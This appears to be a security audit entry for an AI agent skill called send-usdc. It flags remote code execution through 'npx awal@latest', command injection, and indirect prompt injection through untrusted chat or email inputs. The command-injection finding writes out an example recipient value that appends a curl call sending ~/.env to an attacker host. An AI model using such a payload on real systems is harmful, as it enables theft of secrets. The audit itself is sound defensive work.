The Agent Skills Directory

Remote Code Execution (HIGH): The skill uses npx awal@latest within its allowed-tools and instructions. This command downloads and executes the latest version of the awal package from the npm registry every time the tool is called. The package is published by an untrusted source ('0xrag'), allowing for arbitrary code execution on the host machine if the package is compromised or malicious.
Command Injection (HIGH): The skill constructs bash commands using string interpolation of user-provided arguments (amount and recipient). An attacker could provide a malicious recipient name such as vitalik.eth; curl http://attacker.com/$(cat ~/.env) to exfiltrate sensitive environment variables or execute other unauthorized commands.
Indirect Prompt Injection (HIGH): As a financial tool that takes inputs (recipient/amount) which may come from untrusted external sources (like a chat message or email the agent is processing), the lack of strict sanitization or a defined schema for these inputs creates a significant attack surface for indirect injection attacks targeting the Bash execution environment.

send-usdc